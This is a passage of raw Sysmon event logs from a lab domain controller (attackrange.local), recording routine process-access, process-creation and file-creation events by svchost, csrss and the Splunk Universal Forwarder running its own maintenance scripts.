12:02:57.967{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F900-00000000AE01}5452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F1-6064-F900-00000000AE01}5452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.969{266CAFBE-64F1-6064-F900-00000000AE01}5452C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.858{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F800-00000000AE01}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.842{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.842{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.842{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F800-00000000AE01}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.842{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F1-6064-F800-00000000AE01}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.857{266CAFBE-64F1-6064-F800-00000000AE01}6884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.655{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F700-00000000AE01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F700-00000000AE01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64F1-6064-F600-00000000AE01}69686976C:\Windows\system32\cmd.exe{266CAFBE-64F1-6064-F700-00000000AE01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.602{266CAFBE-64F1-6064-F700-00000000AE01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000008393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.596{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® 